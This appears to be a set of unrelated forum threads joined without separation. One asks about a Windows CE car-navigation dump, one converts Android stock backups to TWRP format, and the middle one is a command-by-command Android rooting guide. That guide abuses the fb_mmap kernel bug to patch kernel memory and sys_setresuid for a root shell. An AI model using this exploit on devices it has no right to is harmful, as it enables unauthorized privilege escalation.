Related
Hi all,
i got a new incar navigation system. it has wince 6 installed (Blaupunkt New Nork 800 which is mostly a rebranded ADVENT ADVUV630).
Now, for troubleshooting'n'stuff i've made an Dump from that device using NDumpCE6. I what to use this dump to load it into the Windows CE Emulator form Microsoft.
is there any chance to get it to work?
i got 4 Dumps over all:
Complete Disk: (CF-Card)
DSK1.img - 249 MB (261.095.424 Bytes)
First 16 Hex Values: e9 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Then, i also dumped all Partitions seperatly:
Part00.img - 41,2 MB (43.251.712 Bytes)
First 16 Hex Values: fe 03 00 ea 29 2a 28 00 2a 2a 29 00 2a 2a 2a 00
Part01.img - 30,7 MB (32.243.712 Bytes)
First 16 Hex Values: eb 76 90 45 58 46 41 54 20 20 20 00 00 00 00 00
Which equals to : .vEXFAT (<<< So thats interesting...)
Part02.img - 174 MB (182.976.512 Bytes)
First 16 Hex Values: eb fe 90 4d 53 57 49 4e 34 2e 31 00 08 01 20 00
Which equals to : ...MSWIN4.1....
And little futher : 20 20 46 41 54 33 32 20 20 20 00 00 00 00 00 00
: FAT32 (<<< So thats also interesting...) NOT Anymore - its a Microsoft Windows Boot Record (http://thestarman.pcministry.com/asm/mbr/MSWin41BRinHexEd.htm )
So PART02 seems to hold the boot partition....
Update: Funny thing - i just tried to mount part02.img into DAEMON-Tools - and guess what: it works!
i found one Directory called: CE69
In that Folder i found some Files and other Folders...
arial-uni2.1.ttf
Bluetooth.dll
CE69.EXE
DriveInterfaceCTL.dll
HYDIB.DLL
INIFILE.DLL
INSTALL.INI
Memory.dll
MFCCE400.DLL
MPU.BIN
OSCtrl.exe
Protocol.dll
RunAppPath.txt
SAMPLE.DUI
SYSTEM.INI
UIContainer.dll
UIDesignerDLL.dll
UIFC.DLL
Upgrade.exe
XMRadio.dll
uifilters <FOLDER>
Resource <FOLDER>
Things i tried allready:
Use dumprom.exe to extract anything. Well i got something out of the first partition - but thats only some wince files:
binfs.dll
BINFSCheck.dll
boot.hv
busenum.dll
ceddk.dll
coredll.dll
default.hv
device.dll
devmgr.dll
filesys.dll
flashdrv.dll
fsdmgr.dll
hd.dll
i2c.dll
initdb.ini
initobj.dat
k.ceddk.dll
k.coredll.dll
k.fpcrt.dll
kernel.dll
mspart.dll
nk.exe
oalioctl.dll
osaxst0.dll
pm.dll
regenum.dll
romfsd.dll
sdbus.dll
sdhc.dll
sdmemory.dll
servicesd.exe
user.hv
utldrv.dll
wince.nls
okay - im now try to find something out about that exfat dump and if i could load it somehow...
ofcourse, any help is very welcomed ;-)
Hello,
I may be able to help you as I have the advuv630, but I am curious how do you get the NdumpCE6 to run in the first place on your unit? I see everyone saying "run it" but never how lol.... like do you name it something special and put it on sd card or something?
--thesh0ck
wow, 2012 this post. well to revive if possible, any luck. Messing with my wince head unit in my truck
Here is an open-source method, based on djrbliss' fb_mmap exploit, to possibly root your phone (with adb enabled).
Theoretically, everything which is in the compatibility list of motochopper should be compatible with my open-source method.
Theoretically, it may even work for other phones, included old phones and old tablets, provided the fb_mmap exploit is not patched. But so far it was only tested on Android v4.1.
You may want to use the recovery mode to boot the oldest official ROM you can find for your device (with our without flashing it), it should be older than mid 2013, when that but was found.
It does not need to be an exynos-based device: I use only this name exynos because I reused the priviledge escalation that was in the exynos exploit.
In step 1, kernelchopper uses the fb_mmap exploit to gain read-write access on the kernel residing in memory. Then a priviledge escalation in step 2 and 3 gives a root shell, without modifying the SDcard or any files, without rebooting.
It is based on:
- 300 lines of C code I attached to this post (older version is attached there)
- an ARM compiler to compile this code, if you do not want to trust my resulting binaries attached to http://forum.xda-developers.com/showpost.php?p=44872887&postcount=14
- any apk with a terminal you trust (I use Install Terminal IDE, Terminal Emulator will do).
- any busybox you trust (I use the one from Terminal IDE).
- a computer with the android developpement package, I used adt-bundle-linux-x86-20130729
STEP 0: You may apply this on any Android system on your own risks. If your output of any instruction is not exactly as shown here, you should adapt following instructions accordingly (following color codes, and counting underlined words in hexadecimal notation), or better quit. If you do not get exactly all the outputs I colored here in red, you should QUIT or change previous instructions.
If you have no internal microSD, I suggest to you to first chdir a directory of you computer which can host one file of size >4Gb (3898777809 bytes for my padfone 2, the day I bought it).
STEP 1: finding s_show->seq_printf format string (in example given found at: 0x80c281c6).
Open terminal IDE, select "install system". You do not need to "install gcc". The select the first menu item named "terminal IDE", and type at its prompt:
Code:
chmod 1777 /data/data/com.spartacusrex.spartacuside/files ; cp system/bin/busybox grep ; chmod 755 grep
We now use adb to put all attached files (unzipped) in /data/data/com.spartacusrex.spartacuside/files. The /usr/bin/script command is specific to linux; if you do not have it, it would be more difficult to make bug reports, and you will need a microSD card, or an USB disc plugged into your android.
Code:
script backup_before_installing_su_to_disk
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/kernelchopper /data/data/com.spartacusrex.spartacuside/files
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/exynos-abuse-static /data/data/com.spartacusrex.spartacuside/files
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb shell
cd /data/data/com.spartacusrex.spartacuside/files
./grep -l . /dev/graphics/fb0
[COLOR="Red"]/dev/graphics/fb0[/COLOR]
./grep Kernel /proc/iomem
[COLOR="RoyalBlue"]80208000[/COLOR]-80d9e39f : Kernel code
80f04000-8128184b : Kernel data
./kernelchopper d [COLOR="RoyalBlue"]80208000[/COLOR] 2
[COLOR="RoyalBlue"]80208000[/COLOR] 00 00
./kernelchopper d [COLOR="RoyalBlue"]80208000[/COLOR] c00000 | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 70 4b 20 25 63 20 25 73 0a 00\|: 4b 20 25 63 20 25 73 0a 00\|: 20 25 63 20 25 73 0a 00\|: 25 63 20 25 73 0a 00\|: 63 20 25 73 0a 00\|25 70 4b 20 25 63 20 25 73 0a $\|25 70 4b 20 25 63 20 25 73 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 $\|25 70 4b 20 25 63 $' | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 20 25 73 0a 00\|: 25 73 0a 00\|: 73 0a 00\|: 0a 00\|: 00\|25 70 4b 20 25 $\|25 70 4b 20 $\|25 70 4b $\|25 70 4b $\|25 70 $\|25 $'
[COLOR="Green"]80c281c[/COLOR]0: 5b 25 73 5d 0a 00 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d [COLOR="Green"]80c281c[/COLOR]0 20
80c281c0: [U]5b 25 73 5d 0a 00[/U] 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d [COLOR="Green"]80c281c[/COLOR][U]6[/U] b
[COLOR="Olive"]80c281c6[/COLOR]: [COLOR="Red"]25 70 4b 20 25 63 20 25 73 0a 00[/COLOR]
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR]
[COLOR="Red"]204b7025[/COLOR]
./grep sys_setresuid /proc/kallsyms
00000000 T sys_setresuid
00000000 T sys_setresuid16
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR] 20207025
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR]
[COLOR="Red"]20207025[/COLOR]
./grep sys_setresuid /proc/kallsyms
c[COLOR="SandyBrown"]00856f0[/COLOR] T sys_setresuid
c00b7318 T sys_setresuid16
Notice that /proc/kallsyms now gives offsets instead of 00000000.
STEP 2: patching sys_setresuid, applying manually exynos-abuse.c (found at 0x802856f0, which is 0x00856f0 plus 80208000). You should replace the underlined lone 8 by the number of bytes underlined, before the 00 00 50 e3 ...
Code:
./kernelchopper d [COLOR="YellowGreen"]802856f0[/COLOR] 80 | ./grep '00 00 50 e3\|20 00 00 ea'
[COLOR="Purple"]8028572[/COLOR]0: [U]04 72 93 e5 a7 da ff eb[/U] 00 00 50 e3 20 00 00 ea
./kernelchopper d [COLOR="Purple"]8028572[/COLOR][U]8[/U] 8
[COLOR="MediumTurquoise"]80285728[/COLOR]: [COLOR="Red"]00 00 50 e3 20 00 00 ea[/COLOR]
./kernelchopper m [COLOR="MediumTurquoise"]80285728[/COLOR]
[COLOR="Red"]e3500000[/COLOR]
./kernelchopper m [COLOR="MediumTurquoise"]80285728[/COLOR] e3500001
STEP 3: getting a root shell.
Code:
./exynos-abuse-static
[email protected]:/data/data/com.spartacusrex.spartacuside/files # /system/bin/id
uid=[COLOR="Red"]0[/COLOR](root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
Step 4: now you are root until end of connexion by adb. I strongly suggest to you to make the first true backup, to have a chance to restore phone to current state. With an internal microSD, you can type:
Code:
cp grep bzip2
./bzip2 -c < /dev/block/mmcblk0 > /Removable/Storage1/backup.bz2
To exploit this file, you will need kpartx.
If you have NO internal microSD, try a network wifi drive; or if you can wait a full day (like me), you can do:
Code:
cp grep bzip2
cp grep uuencode
./bzip2 -c < /dev/block/mmcblk0 | ./uuencode -
The result will be shown on current window, so you have better hide it once it works. I had a performance of 400kb/s with hidden xterm.
You will then be able to recover its content with
Code:
LANG= grep -aA99999999 '^begin 666 -' < backup_before_installing_su_to_diskreal | uudecode -o backup.bz2
You may now install /system/xbin/su, eventually renamed to avoid exposing su to malware. I personnaly installed suid root a wrapper to the sshd service of gentooandroid.sourceforge.net.
Here is my firmware.
Code:
Android version: 4.1.1, 3.4.0-perf-g64..., M3.13.30-A68_101034 [Jan 22 2013]
If you need help, please type up-arrow repeatedly, down-arrow repeatedly, then provide the file backup_before_installing_su_to_diskreal.
Credits to alephzain for original version of exynos-abuse.c, SW686 for kernelchopper.c, spartacusrex for Google-Play's Terminal IDE.
This was tested independently here, and the first version of this post was made in the same thread.
Please suggest tags, this is the first thread I open.
./kernelchopper d 80208000 c00000 | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 70 4b 20 25 63 20 25 73 0a 00\|: 4b 20 25 63 20 25 73 0a 00\|: 20 25 63 20 25 73 0a 00\|: 25 63 20 25 73 0a 00\|: 63 20 25 73 0a 00\|25 70 4b 20 25 63 20 25 73 0a $\|25 70 4b 20 25 63 20 25 73 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 $\|25 70 4b 20 25 63 $' | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 20 25 73 0a 00\|: 25 73 0a 00\|: 73 0a 00\|: 0a 00\|: 00\|25 70 4b 20 25 $\|25 70 4b 20 $\|25 70 4b $\|25 70 4b $\|25 70 $\|25 $'
Click to expand...
Click to collapse
Return notthing, how crack ?
PJ.C said:
Return notthing, how crack ?
Click to expand...
Click to collapse
Try
Code:
./kernelchopper d 80208000 2
Try
Code:
./kernelchopper d 80208000 2
Click to expand...
Click to collapse
Code:
135|[email protected]:/data/local/tmp $ ./grep Kernel /proc/iomem
./grep Kernel /proc/iomem
4032e000-40abffff : Kernel text
40ac0000-4101f7d7 : Kernel data
[email protected]:/data/local/tmp $
[email protected]:/data/local/tmp $ ./grep Kernel /proc/iomem
./grep Kernel /proc/iomem
4032e000-40abffff : Kernel text
40ac0000-4101f7d7 : Kernel data
[email protected]:/data/local/tmp $ ./kernelchopper d 4032e000 2
./kernelchopper d 4032e000 2
address out of range (mapping covers 50000000..ffffffff)
1|[email protected]:/data/local/tmp $
My phone model is GT-I9220
Oh,my fault, there is no Kernel code ..
Code:
1|[email protected]:/data/local/tmp $ cat /proc/iomem
cat /proc/iomem
03830000-038300ff : samsung-i2s.0
03830000-038300ff : samsung-i2s
10060000-10060fff : s3c2410-wdt
10070000-100700ff : exynos-rtc
10070000-100700ff : exynos-rtc
100b0000-100b0fff : s5p-tvout-cec
100c0000-100cfffe : s5p-tmu
100c0000-100cfffe : s5p-tmu
11800000-11800fff : s3c-fimc.0
11800000-11800fff : s3c-fimc
11810000-11810fff : s3c-fimc.1
11810000-11810fff : s3c-fimc
11820000-11820fff : s3c-fimc.2
11820000-11820fff : s3c-fimc
11830000-11830fff : s3c-fimc.3
11830000-11830fff : s3c-fimc
11840000-1184ffff : s5p-jpeg
11840000-1184ffff : s5p-jpeg
11880000-11883fff : s3c-csis.0
11880000-11883fff : s3c-csis
11890000-11893fff : s3c-csis.1
11890000-11893fff : s3c-csis
11a20000-11a20fff : s5p-sysmmu.1
11a20000-11a20fff : s5p-sysmmu.1
11a30000-11a30fff : s5p-sysmmu.2
11a30000-11a30fff : s5p-sysmmu.2
11a40000-11a40fff : s5p-sysmmu.3
11a40000-11a40fff : s5p-sysmmu.3
11a50000-11a50fff : s5p-sysmmu.4
11a50000-11a50fff : s5p-sysmmu.4
11c00000-11c07fff : s3cfb.0
11c00000-11c07fff : s3cfb
11c40000-11c47fff : ielcd
11c80000-11c8ffff : s5p-dsim.0
11c80000-11c8ffff : s5p-dsim
11ca0000-11ca0fff : mdnie
12480000-12480fff : s3c_otghcd
12480000-12480fff : s3c-usbgadget
12480000-12480fff : s3c-usbgadget
12530000-12530fff : s3c-sdhci.2
12530000-12530fff : mmc1
12540000-12540fff : s3c-sdhci.3
12540000-12540fff : mmc2
12550000-12550fff : dw_mmc
12550000-12550fff : mmc0
12580000-125800ff : s5p-ehci
12680000-12681000 : s3c-pl330.1
12680000-12681000 : s3c-pl330
12690000-12691000 : s3c-pl330.2
12690000-12691000 : s3c-pl330
12800000-12800fff : s5p-fimg2d
12800000-12800fff : s5p-fimg2d
12850000-12851000 : s3c-pl330.0
12850000-12851000 : s3c-pl330
12a20000-12a20fff : s5p-sysmmu.9
12a20000-12a20fff : s5p-sysmmu.9
12c00000-12c0ffff : s5p-vp
12c00000-12c0ffff : s5p-vp
12c10000-12c1ffff : s5p-mixer
12c10000-12c1ffff : s5p-mixer
12c20000-12c2ffff : s5p-sdo
12d00000-12dfffff : s5p-hdmi
12d00000-12dfffff : s5p-hdmi
12e20000-12e20fff : s5p-sysmmu.12
12e20000-12e20fff : s5p-sysmmu.12
13000000-13000097 : Mali-400 GP
13001000-1300102f : Mali-400 L2 cache
13003000-13003023 : Mali-400 MMU for GP
13004000-13004023 : Mali-400 MMU for PP 0
13005000-13005023 : Mali-400 MMU for PP 1
13006000-13006023 : Mali-400 MMU for PP 2
13007000-13007023 : Mali-400 MMU for PP 3
13008000-130090ef : Mali-400 PP 0
1300a000-1300b0ef : Mali-400 PP 1
1300c000-1300d0ef : Mali-400 PP 2
1300e000-1300f0ef : Mali-400 PP 3
13400000-1340ffff : s3c-mfc
13400000-1340ffff : s3c-mfc
13620000-13620fff : s5p-sysmmu.13
13620000-13620fff : s5p-sysmmu.13
13630000-13630fff : s5p-sysmmu.14
13630000-13630fff : s5p-sysmmu.14
13800000-138000ff : s5pv210-uart.0
13800000-138000ff : s5pv210-uart
13810000-138100ff : s5pv210-uart.1
13810000-138100ff : s5pv210-uart
13820000-138200ff : s5pv210-uart.2
13820000-138200ff : s5pv210-uart
13830000-138300ff : s5pv210-uart.3
13830000-138300ff : s5pv210-uart
13860000-13860fff : s3c2440-i2c.0
13860000-13860fff : s3c2440-i2c
13870000-13870fff : s3c2440-i2c.1
13870000-13870fff : s3c2440-i2c
13890000-13890fff : s3c2440-i2c.3
13890000-13890fff : s3c2440-i2c
138b0000-138b0fff : s3c2440-i2c.5
138b0000-138b0fff : s3c2440-i2c
138c0000-138c0fff : s3c2440-i2c.6
138c0000-138c0fff : s3c2440-i2c
138d0000-138d0fff : s3c2440-i2c.7
138d0000-138d0fff : s3c2440-i2c
138e0000-138e03ff : s5p-i2c-hdmi-phy
138e0000-138e03ff : s5p-i2c-hdmi-phy
13910000-13911fff : samsung-adc-v3
40000000-7fffffff : System RAM
4032e000-40abffff : Kernel text
40ac0000-4101f7d7 : Kernel data
[email protected]:/data/local/tmp $
PJ.C said:
My phone model is GT-I9220
Oh,my fault, there is no Kernel code ..
Code:
: samsung-adc-v3
40000000-7fffffff : System RAM
4032e000-40abffff : Kernel text
40ac0000-4101f7d7 : Kernel data
[email protected]:/data/local/tmp $
Click to expand...
Click to collapse
What is your android version number ?
try attached binary.
xdej said:
What is your android version number ?
try attached binary.
Click to expand...
Click to collapse
Code:
[email protected]:/data/local/tmp $ ./kernelchopper_10000000 d 4032e000 2
unexpected mmap() error: Operation not permitted
1|[email protected]:/data/local/tmp $
The problem is I cant get the address of Kernel code ..
android version 4.1.2 build id JZO54K.I9220ZCLSF
PJ.C said:
Code:
[email protected]:/data/local/tmp $ ./kernelchopper_10000000 d 4032e000 2
unexpected mmap() error: Operation not permitted
1|[email protected]:/data/local/tmp $
The problem is I cant get the address of Kernel code ..
According to http://forum.xda-developers.com/showpost.php?p=40873964&postcount=2 you have found it. text=code apparently.
android version 4.1.2 build id JZO54K.I9220ZCLSF
Click to expand...
Click to collapse
mmap worked with map_start = 50000000 on you phone, but not with map_start = 10000000, so let's try map_start = 40000000 (use attached binary or source code).
xdej said:
mmap worked with map_start = 50000000 on you phone, but not with map_start = 10000000, so let's try map_start = 40000000 (use attached binary or source code).
Click to expand...
Click to collapse
get the same result :
Code:
[email protected]:/data/local/tmp $ ./kernelchopper_40000000 d 4032e000 2
unexpected mmap() error: Operation not permitted
1|[email protected]:/data/local/tmp $
how can i compile this source code for phone ?
PJ.C said:
get the same result :
Code:
[email protected]:/data/local/tmp $ ./kernelchopper_40000000 d 4032e000 2
unexpected mmap() error: Operation not permitted
1|[email protected]:/data/local/tmp $
Click to expand...
Click to collapse
The exploit fb_mmap seems to be patched on your phone.
Try booting your phone with the oldest official ROM you can find (with our without flashing it).
PJ.C said:
how can [you] compile this source code for phone ?
Click to expand...
Click to collapse
I use gentooandroid.sourceforge.net.
If you can reach a raspberry PI, you can use its compiler.
If you know how to do it, you may also cross-compile for armv7j platforms.
Thanks a lot! I will try it.
Hi xdej
Thanks for your work!
I try to root galaxy express 2 (sm-g3815)
shell is in graphics group but kernelchopper (or kernelchopper_10000000) do not return prompt (so I have to ^C)
~ # adb shell
[email protected]:/ $ touch /dev/graphics/fb0
[email protected]:/ $ ls -al /dev/graphics/fb0
crw-rw---- system graphics 29, 0 2014-01-01 23:49 fb0
[email protected]:/data/local/tmp $ id
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
[email protected]:/ $ grep Kernel /proc/iomem
80208000-80d55867 : Kernel code
80f04000-811a0493 : Kernel data
[email protected]:/ $ cd /data/local/tmp
[email protected]:/data/local/tmp $ chmod 755 kernelchopper*
[email protected]:/data/local/tmp $ ./kernelchopper d 80208000 2
^C
[email protected]:/data/local/tmp $ ./kernelchopper_10000000 d 80208000 2
^C
Have a nice day and happy 2014
Nofan Tasi said:
shell is in graphics group but kernelchopper (or kernelchopper_10000000) do not return prompt (so I have to ^C)
Click to expand...
Click to collapse
Let it run for hours, to give it better chances.
Hi xdej
Thanks so much for giving timing advice
By the way, clearly first step in your hack seem to expose kallsyms.
Can you explain a bit what this does and how this works?
Have a nice day!
Hi xdej
I run kernelchopper for an hour or 4 and device almost melts No output
Maybe one (perhaps myself) can make it a bit more verbose as to mention about what it is trying to do.
Have a nice day
Nofan Tasi said:
By the way, clearly first step in your hack seem to expose kallsyms.
Can you explain a bit what this does and how this works?
Click to expand...
Click to collapse
I just translated the hack listed below and published in lines 68--89 of file exynos-abuse.c attached to message http://forum.xda-developers.com/showthread.php?p=35469999 ; I translated it from C to syntax of kernelchopper. The comments are the explaination you asked for.
Code:
/*
* search the format string "%pK %c %s\n" in memory
* and replace "%pK" by "%p" to force display kernel
* symbols pointer
*/
for(m = 0; m < length; m += 4) {
if(*(unsigned long *)tmp == 0x204b7025 && *(unsigned long *)(tmp+1) == 0x25206325 && *(unsigned long *)(tmp+2) == 0x00000a73 ) {
printf("[*] s_show->seq_printf format string found at: 0x%08X\n", PAGE_OFFSET + m);
restore_ptr_fmt = tmp;
*(unsigned long*)tmp = 0x20207025;
found = true;
break;
}
tmp++;
}
if (found == false) {
printf("[!] s_show->seq_printf format string not found\n");
exit(1);
}
found = false;
Hi !
Nofan Tasi said:
Maybe one (perhaps myself) can make it a bit more verbose as to mention about what it is trying to do.
Click to expand...
Click to collapse
If you share the patched version of kernelchopper but are unable to compile it, I will compile it for you.
Hi xdej,
Thanks for all help.
- for Linux only -
Stock Recovery to TWRP Backup Converter for Android system recovery <3e>
This progam is basically written for unpacking stock recovery android backup userdata_20160823_100259.backup + convert it into custom recovery nandroid backup data.ext4.win000 (but you can create your own TWRP Backups from "any" data source, too)
content and usage of bckp2win.sh is similar to bckp2cwm.sh with some slight modifications. based on previous version, it skips the checksum and unpack /data partition from userdata_00000000_000000.backup then re-pack it as TWRP Backup. optionally the screenlock pattern can be unlocked.
Requirements:
- pc with linux
- ext4 formatted hard disk
may work on ntfs, give a try (in case backup is a partition image)
Requirements (source phone):
- Android system recovery <3e> with
- "backup user data" functionality
- data must not encrypted
- external sdcard
Requirements (target device):
- root
- TWRP custom recovery
- working identical ROM pre-installed (like source phone)
before you start:
download this flashable UPDATE-sdcard.Fix.Permissions-signed.zip from osm0sis @ xda-developers to your phones memory or external sdcard - you might need it later
http://forum.xda-developers.com/showthread.php?t=2239421
TWRP and Internal Storage:
even if TWRP recovery process claims not touching /data/media, it restores files anyway. this is a great advantage side effect as we can easily restore Pictures and Files by simply including it in the backup. However, this will overwrite existing data - please don't use this option unless you know what you're doing!
if apps crashing after restoring from TWRP, this might have to do with Internal Storage - the above flashable zip will fix permissions, ownership and selinux labels for /data/media in case you manually added some files (regarding /data - of course - there is no tool in the world, which can do the same for /data partition - be warned never copy files, just always move files from one linux file system to another, and never use a windows file system)
bckp2win.sh is a linux bash script using GNU tar for creating TWRP archive files from userdata_yyyymmdd_hhmmss.backup files.
in TWRP Backup each data.ext4.win000 file represent a standalone tarball archive - this means each single archive can be unpacked for its own - without concatenating them, or having splitted files spreaded over multiple archives. unfortunately i don't know how they do it (i think TWRP use its own tar implementation), so i decided to write another bash script wich is basically doing the same thing (creating multipart standalone tarball archives):
edit: this is the main converting script (and the only file you need)
multi_tar.sh is not limited to Android system recovery <3e> userdata backup and can be used for any scope of application.
This means you can simply create TWRP Backups from "any" data source. It is summarizing files in a index file until archive size is reached and then archiving from index with GNU tar. This is a very slow procedure but it works. optionally it uses GZIP compression. (i really dont know how to check compressed file size from bash without compressing it, therefore it is compressed twice in a 2 pass way, 1-st pass is for checking size only)
edit: do not download this script, try bckp2win.sh without multi_tar.sh first (press No when asked). it is for splitting large backups only and not required in most cases
twrp_sign.sh is another bash script for creating sha2 checksums especially for TWRP Backups. But checksums can be disabled in TWRP - therefore its optional.
needs ~ 120% of free disk space and takes time about ~ 30 min, enjoy your coffee
[TUTORIAL] How to convert stock backup into TWRP backup
First of all you need to know, that userdata_yyyymmdd_hhmmss.backup files contain user data only. it is NOT a full nandroid backup like TWRP / CWM.
So we can just restore data partition from TWRP:
userdata_20160823_100259.backup -> data.ext4.win000 -> /data
The data partition contains the Internal Virtual SD Card. It is usually not included in TWRP backup. It is your decision to manually copy back to phone (recommended). But you can also restore Internal Virtual SD Card from TWRP:
/data/media/0 -> /storage/emulated/0
IMEI and WiFi MAC-Address:
/data/nvram (NOT recommended)
If there is a copy of NVRAM partition in folder /data/nvram, the script will delete it by default. However, there is a option to use IMEI and WiFi MAC-Address from backup (clone), instead from Phone.
Windows Users please click here
download UNetbootin -> https://unetbootin.github.io <- scroll this page down for tutorial
format USB flash drive FAT32install any Linux Distro to USB flash drive
Reboot your PC from USB flash drive
to access the boot menu while booting your computer:
- press the appropriate key F11 or F12 during the initial startup screen
- select the USB boot option in the BIOS boot menu
- boot Default entry
congratulations, you have
sucessfully entered your
own working Linux system!
it's easy, isn't it?
Now, come back to forum.xda-developers.com
- find Start Menu on upper left corner
- open the "Web Browser" from Favorites
- search for "bckp2win" in google
you can add your Keyboard Layout from: Settings - Keyboard
Note: performance of Firefox badly depends on USB flash drive speed
if it is too slow, try another one, or disable persistence:
- find syslinux.cfg file on USB flash drive
- open syslinux.cfg file with editor
- delete --- persistent from Try Xubuntu without installing entry
- save the changes, reboot from USB flash drive Try Xubuntu without installing entry
However, without persistence it is a read-only Live system and will lose all settings on reboot
Let's begin with preparations
- copy UPDATE-sdcard.Fix.Permissions-signed.zip to microSD card / or
- download UPDATE-sdcard.Fix.Permissions-signed.zip to target phone
- connect the source phone USB cable / or
- insert the microSD card into the PC's SD Card Reader
- copy all userdata_20160823_100259.backup files to any folder on local disk
- download all the zip files from this thread
- unpack zip files to same folder on local disk
run the shell script in Terminal
- do right-click somewhere in the backup folder, select "Open Terminal Here"
- type "sudo bash bckp2win.sh" in Terminal
- check disk space
example: when backup is 2 GB,
Avail must > 2,4 GB (120%)
when backup is 55 GB,
Avail must > 66 GB (120%)
- check file system type
Type must not vfat, fat32
all others allowed
(ntfs, ext4, fuseblk, ...)
this is very important! otherwise it will fail at the end and waste your time, and you won't know the reason. so please check carefully
- select file number to extract
- wait a long time, depends on disk speed and backup size (1~2 min / 1 GB)
Halftime break
- when message appears Press 'y' to unlock: [y/n] - Congratulations! The backup is sucessfully extracted
(if you need to edit/modify/delete files within backup this is the point for break)
- to continue with re-packing:
answer all questions with No
(or just press Enter for default):
Android sparse image (simg2img) support -> No
Flash-Friendly File System (F2FS) support -> No
unlock screenlock pattern -> No
clone old IMEI and Wifi Mac Address -> No
Restore /storage/emulated/0 -> No
use gzip compression -> No
Extract Internal Virtual SD Card to local disk -> Yes
(this will extract /data/media to TWRP folder instead, but exclude it from backup)
- wait for the script is finished
- wait for background processes
(it happens sometimes script finishes too early, if there is a data.ext4.win000 + data.ext4.win0000 file, just wait for the target size 1 GB each file)
- if checksums missing or failed, please manually run twrp_sign.sh again
(successful checksums look like this)
Finally we can restore the new backup
- copy back TWRP folder to phone
- boot into recovery mode
- create a failsafe backup (just in case...)
- move folder to the right location via MTP, or
- Advanced -> File Manager -> TWRP/BACKUPS/<serialno>/<backup folder>
- Options (blue icon on the right bottom) -> Move -> TWRP/BACKUPS/<phone name> -> Swipe to confirm
(in case converted backup is not visible in Restore list...)
- restore converted backup from TWRP
- install the flashable UPDATE-sdcard.Fix.Permissions-signed.zip
(just in case you have added files to data/media...)
- boot the phone
- move/copy all your pictures videos etc from TWRP folder back to phone
Troubleshooting
If you fail at some point please try again with more disk space or gzip compression
phone is not showing up on PC
enable Settings -> Developer options -> Select USB Configuration -> MTP:
- goto Settings -> About phone
- tab Build number seven times until you see a message
- goto Settings -> Developer options
- enable Developer options, confirm Allow development settings
- scroll down to -> Select USB Configuration
- select MTP (Media Transfer Protocol)
My source backup file is not in "userdata_YYYYMMDD_hhmmss.backup" format
This script may work with other archives, but only accept "userdata_YYYYMMDD_hhmmss.backup" pattern as input file name. But you can specify any input file or folder as parameter. the script will scan the folder for known archive types and link files into script folder:
sudo bash bckp2win.sh ~/Android/Backup/TWRP/2016-08-23--10-02-59/data.ext4.win*
mkdir: cannot create directory ‘b2wtmp’: File exists
There was a previous session left, delete the folder ‘b2wtmp’ and try again. You can keep previous session for testing purposes with parameter -f force unpack:
sudo bash bckp2win.sh -f
ERROR: something goes wrong. check disk space
The GNU tar unpacking or archiving process may fail for various reasons. However, you can suppress error messages and skip this exit point for testing purposes with parameter -f force unpack. If you run out of disk space, you can exclude folders from backup with parameter -e --exclude PATTERN, for example:
sudo bash bckp2win.sh -e */com.google.android.googlequicksearchbox*
Bugs & Known Issues
extractTarFork() process ended with ERROR: 255
probably bug in script. at the moment, only solution is manually restoring backup files. i know its annoying but i don't know the reason, yet.
- download GNU tar for android
- unpack the zip and copy the tar binary to phone
- in TWRP, copy tar binary to /cache, then wipe data
- in TWRP, go back to -> Advanced -> Terminal
- in Terminal, change directory to backup folder, then run for each file
Code:
chmod 0755 /cache/tar
cd /external_sd/TWRP/BACKUPS/<phone>/2016-08-23--10-02-59*
/cache/tar --selinux --xattrs -P -vxpf data.ext4.win000
(or for compressed files)
busybox gzip -cd data.ext4.win000 | /cache/tar --selinux --xattrs -P -vxp
Please post here for support i will answer your questions
found a multipart image, merge files
==================
... merged
try to unpack ...failed
try to mount as *...failed
skip first 512 bytes and try to mount again as ext2, as rfs, as fsfs
... failed
no files in folder "data"
exiting script
What can I do ?
My phone model is Bluboo S1 with Android 7.0, before I wiped all out I was made backup with stock backup and now I have TWRP 3.2.1. Now I have phone flashed with BLUBOO_S1_Helio_P25_L_V04_20170908 and is working but I want put my old userdata because I think there is all my 230 apps already installed.
Please check if your userdata_20180926_141645.backup is ext4 image. Each file start with a 512 byte checksum header, followed by partition image. The ext4 Super Block will start at offset 1024 bytes (from partition). The ext4 magic number 0xEF53 you can find at offset 0x38 (from the Super Block start)
We can skip (512 bytes) checksum + (1024 bytes) unused padding, because the Super Block start is at (1536 bytes) = 0x600 in this case
Please note the ext4 magic 0xEF53 at offset 0x638
encrypted files not supported
If the files look like this (no zeros within, after skip 512 bytes checksum) it is probably a raw backup of encrypted data partition
you can check with hexdump
Code:
hexdump -C -n1600 userdata_20180926_141645.backup
Unfortunately, these userdata backups are pretty useless since android 7.0 (encrypted by default), because they will not backup efs/metadata. If you wipe data from stock recovery, the metadata is wiped, too. It is impossible to decrypt data without encryption key (which is stored in metadata).
If you are really lucky maybe its not to late, do a read back of metadata partition with SP Flash Tool. Furthermore, check if userdata backup is encrypted
. . .
